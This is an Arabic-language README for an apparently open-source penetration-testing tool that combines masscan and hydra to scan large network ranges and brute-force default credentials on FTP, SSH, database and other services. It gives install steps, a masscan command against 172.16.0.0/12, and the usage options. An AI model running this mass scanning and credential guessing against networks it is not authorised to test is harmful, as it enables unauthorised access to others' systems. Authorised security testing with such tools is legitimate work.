
هجوم تخمين واسع النطاق على مصادقة الخدمات الشائعة باستخدام بيانات اعتماد شائعة.
هجوم القوة العمياء الجماعي على بروتوكولات الشبكة
إثبات مفهوم بسيط لتنفيذ هجوم القوة العمياء الجماعي بسرعة على الخدمات الشائعة في نطاق واسع من الشبكة.
سيقوم بالتحقق من بيانات الاعتماد الافتراضية على ftp, ssh, mysql, mssql...إلخ.
تم إنشاؤه لأغراض اختبار الاختراق المصرح به فقط.
masscan (أسرع من nmap) للعثور على المضيفات النشطة ذات المنافذ الشائعة من قطاع الشبكة.masscan.hydra لتنفيذ هجوم القوة العمياء تلقائيًا على خدمات الشبكة المدعومة على الأجهزة.Kali linux أو أي توزيعة لينكس مفضلةPython 3.10+# Install required tools for the script
apt update && apt install seclists masscan hydra
# Clone the repo
git clone https://github.com/opabravo/mass-bruter
cd mass-bruter
على سبيل المثال، استهدف قطاع شبكة:
نطاق IP خاص:
10.0.0.0/8,192.168.0.0/16,172.16.0.0/12
قم بفحص الأجهزة والمنافذ من 172.16.0.0/12، ثم احفظ المخرجات في ./result/masscan/masscan_<any_name>.<any_ext>
masscan -p 3306,1433,21,22,23,445,3389,5900,6379,27017,5432,5984,11211,9200,1521 172.16.0.0/12 | tee ./result/masscan/masscan_test.txt
ملاحظة: لاستئناف فحص سابق:
masscan --resume paused.conf | tee -a ./result/masscan/masscan_test.txt
قم بتحميل نتيجة masscan ثم ابدأ هجوم القوة العمياء:
python3 mass_bruteforce.py -q -f ~/masscan_script.txt

جلب بيانات الاعتماد المخترقة:
python3 mass_bruteforce.py -s

┌──(root㉿root)-[~/mass-bruter]
└─# python3 mass_bruteforce.py
Usage: [OPTIONS]
Mass Bruteforce Script
Options:
-q, --quick Quick mode (Only brute telnet, ssh, ftp , mysql,
mssql, postgres, oracle)
-a, --all Brute all services(Very Slow)
-s, --show Show result with successful login
-f, --file-path PATH The directory or file that contains masscan result
[default: ./result/masscan/]
--help Show this message and exit.
dpl4hydraنرحب بأي مساهمات!